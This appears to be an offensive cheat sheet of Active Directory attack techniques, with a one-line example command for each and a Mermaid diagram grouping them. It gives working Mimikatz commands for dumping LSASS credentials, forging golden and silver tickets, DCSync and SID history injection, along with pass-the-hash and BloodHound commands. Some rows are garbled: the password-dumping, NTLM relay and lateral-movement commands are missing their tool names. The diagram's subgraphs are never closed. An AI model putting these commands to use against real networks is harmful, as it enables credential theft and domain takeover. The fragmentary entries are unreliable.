Attack AD

Technique Description Example Command
Enumeration Gathering information about the Active Directory environment, including users, groups, and computers. ldapsearch -x -h <DC_IP> -b "dc=example,dc=com"
Kerberos Attacks Exploiting the Kerberos authentication protocol, including techniques like Kerberoasting and Pass-the-Ticket. Invoke-Kerberoast (PowerShell script)
LDAP Enumeration Using LDAP to enumerate users, groups, and other objects in the directory. ldapsearch -x -h <DC_IP> -b "dc=example,dc=com"
Password Dumping Extracting password hashes from memory, registry, or database files. <domain>/<user>@<dc_ip>
Pass-the-Hash Using an extracted hash to authenticate as a user without needing their plaintext password. pth-winexe -U <domain>/<user>%<hash> //<target_ip> cmd
Pass-the-Ticket Using a stolen Kerberos ticket to authenticate as a user. Invoke-Mimikatz -Command '"kerberos::ptt <ticket>"'
Silver Ticket Attack Forging Kerberos TGS tickets to gain access to specific services. Invoke-Mimikatz -Command '"kerberos::golden /user:<user> /domain:<domain> /sid:<sid> /target:<server> /rc4:<key>"'
Golden Ticket Attack Forging Kerberos TGT tickets to gain control of the entire domain. Invoke-Mimikatz -Command '"kerberos::golden /user:<user> /domain:<domain> /sid:<sid> /krbtgt:<hash>"'
DCSync Attack Mimicking the behavior of a Domain Controller to extract credentials from the AD database. Invoke-Mimikatz -Command '"lsadump::dcsync /user:<user>"'
BloodHound Using the BloodHound tool to analyze AD relationships and identify attack paths. Invoke-BloodHound -CollectionMethod All
Abusing Trust Relationships Exploiting trust relationships between domains to escalate privileges or move laterally. nltest /domain_trusts
GPO Abuse Exploiting or modifying Group Policy Objects to gain elevated privileges or persistence. gpresult /r to review applied policies.
Domain Trust Exploitation Abusing trust relationships between domains to compromise additional domains. nltest /domain_trusts
Credential Theft Stealing credentials from memory, SAM, or LSASS. mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"
SID History Injection Adding a SID to an account's SID history to escalate privileges. Invoke-Mimikatz -Command '"sid::add /user:<user> /domain:<domain> /sid:<sid>"'
NTLM Relay Attack Relaying NTLM authentication to execute code on another machine. -t smb://<target_ip>
Lateral Movement Moving from one compromised machine to others within the network. <domain>/<user>@<target_ip>
graph TD
    A[Active Directory Attack Techniques]
    subgraph "Enumeration and Information Gathering"
        A --> B[Enumeration]
        B --> C[LDAP Enumeration]
    subgraph "Kerberos and Credential Attacks"
        A --> D[Kerberos Attacks]
        D --> E[Pass-the-Ticket]
        D --> F[Pass-the-Hash]
        D --> G[Golden Ticket Attack]
        D --> H[Silver Ticket Attack]
        D --> I[DCSync Attack]
    subgraph "Credential Dumping and Theft"
        A --> J[Password Dumping]
        J --> K[Credential Theft]
    subgraph "Abuse and Exploitation"
        A --> L[GPO Abuse]
        A --> M[Domain Trust Exploitation]
        A --> N[Abusing Trust Relationships]
        A --> O[SID History Injection]
    subgraph "Tools and Lateral Movement"
        A --> P[BloodHound]
        A --> Q[NTLM Relay Attack]
        A --> R[Lateral Movement]